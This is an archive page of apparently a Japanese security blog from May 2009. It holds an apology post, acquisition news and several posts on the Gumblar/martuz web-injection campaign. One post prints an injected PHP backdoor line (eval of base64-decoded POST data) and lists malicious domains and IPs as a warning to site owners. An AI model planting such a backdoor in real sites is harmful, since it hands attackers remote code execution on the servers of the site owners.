Archive for 5 月 18th, 2009

nifty-serve 感染?に関する誤解へのお詫び

Posted in Announce, apologize on 5 月 18th, 2009 by gnome

一部で問題になっているということですので、ここにお詫びさせていただきます。

まず、nifty serve 全体が感染しているような意図の記事を書いたことはありません。

nifty serve 株式会社様 の TOP および、そのコンテンツ内に感染コンテンツがあったことを私が確認したことはありません。
また、そうした内容の記事を書いたこともありません。




niftyのユーザ様と思われる方が、開いていたサイトが感染しており、

メールも BBSへの警告も反応が無く、ホスティング会社様の abuse@xxx.xxx への警告にも反応がなかったため、注意喚起の意味も含めて、当該の記事を書いたことはあります。
(申し訳ありませんが、現在当該記事は非公開扱いです。)

※当該ホームページは現在閉鎖されています。
現在のところ、私が確認している Nifty-Serve に「ホストされている」サイトでの感染事例は確認できません。



「記事」という言葉を使うことに、抵抗がありますが、風説の流布になる可能性がありますので、できればそういった内容で、ここの記事を一部抜粋することはご遠慮くださいますようお願いします。


また、誤解を避けるためにお断りしておきますが、現在までに nifty-serve様から何らかのコンタクトは一切ありません。
一部に流布されているような圧力の存在は、ここに一切無いことをお断りしておきます。

当該関係者の方々にご迷惑をおかけしたことを改めてお詫び申し上げます。

申し訳ありません。

2009.05.18 PM 22:00
Underforge 管理人 G`nome


尚、このポストは1週間、 Sticky にします。
※期間長すぎ!と指摘されましたので、今日 (05/19)までということにしておきます。

3 Comments »

McAfee pay $33mil for SolidCore Systems

Posted in News on 5 月 18th, 2009 by gnome

McAfee が、米SolidCore Systemsを3300万ドルで買収、出来高によっては更に 1400万ドルを増資すると発表しました。


McAfeeがホワイトリスト技術のSolidcoreを買収

原文:
McAfee, Inc. to Acquire Solidcore Systems, Inc.–Advances Endpoint Security and Risk Management

他:
McAfee to Buy SolidCore Systems for $33 Million


Solidcoreはホワイトリスト形式のセキュリティ技術で、「認証された」アプリケーションしか許可しないことで企業のセキュリティを堅牢なものにするシステム構築の会社です。
そう・・すでにブラックリスト形式では追いつけない部分が多いのは、今回の惨事をみても明らかです。

Secure Computingを買収してまだ日が浅いってのに、すごいなぁと感心してしまいました
しかし、McAfee お金もってるなぁ・・


ちなみに、日本の現地代理店はコチラ
Solidcore Systems|東京エレクトロン デバイス株式会社

Leave A Comment »

Malware's puppy

Posted in security on 5 月 18th, 2009 by gnome

たまには、こんなのでも・・
Baby Malware

5日間だけだよ~
スペシャルカードが貴方にとどいてます~
秘密のメッセージを伝えるね

「I love you!」

メッセージがあるから
ここをクリックしてね


というか卑怯だぞコレは!

踏んだらもちろん Malware です(笑)

Leave A Comment »

[Symantec] A report regarding gumblar.cn

Posted in security on 5 月 18th, 2009 by gnome

Viral Web Infections using Malware? Gumblar is, Unfortunately, Just Another Day on the Web
誤訳したらトンデモナイコトになりそうですので、原文を読んでください。

感想は避けよう(笑)

ただ、213.xxx.xxx.xxx に言及したセキュ会社は初めてかもしれませんね。
この記述では具体的に何が悪いとかは判りませんが・・・

この記載を見たら、Symantecは 213.0.0.0/8 全部塞いでるような印象を受けるんですが、そうなんですか?


言いたいことが言えなくなった個人Blogに存在意義があるのかどうか? 難しい問題です

IPSを入れてるユーザは守られてるとか言われてもナァ・・

Leave A Comment »

martuz 関連の新たな IP?

Posted in security on 5 月 18th, 2009 by gnome

A warning new malicious IPs regarding martuz

なんかもう、 zlkon系の話しかないのかなぁ・・(嘆息)


最初、このインジェクションを見たとき、「PHPだともっと訳わかんなくできるような?」とか思っていたのが現実化しました。


eval(base64_decode(’aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==’));

というコードを ランダム名.phpのようなファイルで埋め込まれ、それを include させられるケースが現れたようです。

情報元が感染源なので、貼れません(汗)

これはPHPを使った CMS の場合、どこにその悪意コードが入っているのか? 少しチェックしただけでは判らなくなってしまったことを意味しています。

Wordpress等の PHP ベースの CMS を展開しているサイトオーナの方は、自分が意図した覚えの無い include(), require()の存在に注意するようにしてください。

※といっても、「勝手にインジェクションされるものを、どう注意しろっていうんだ!?」というお叱りの声がチラホラ・・・

----------
また、別の IP の報告もありますが、同一のものかはよくわかりません。

martuz.cn : 95.129.145.58

findyourbigwhy.cn : 85.214.90.254
bigtopsuper.cn : 85.214.90.254

MDLでは 85.214.9xx.xxx 範囲内では 85.214.90.254 しか引っかかりません。
2009/05/12 から Trojan配布の前科があります。

----------

いったい、いつになったら収まるのでしょうか?

Leave A Comment »

ホットワード padding margin 感染 誤解 一部
割引クーポンまとめ情報 - クー割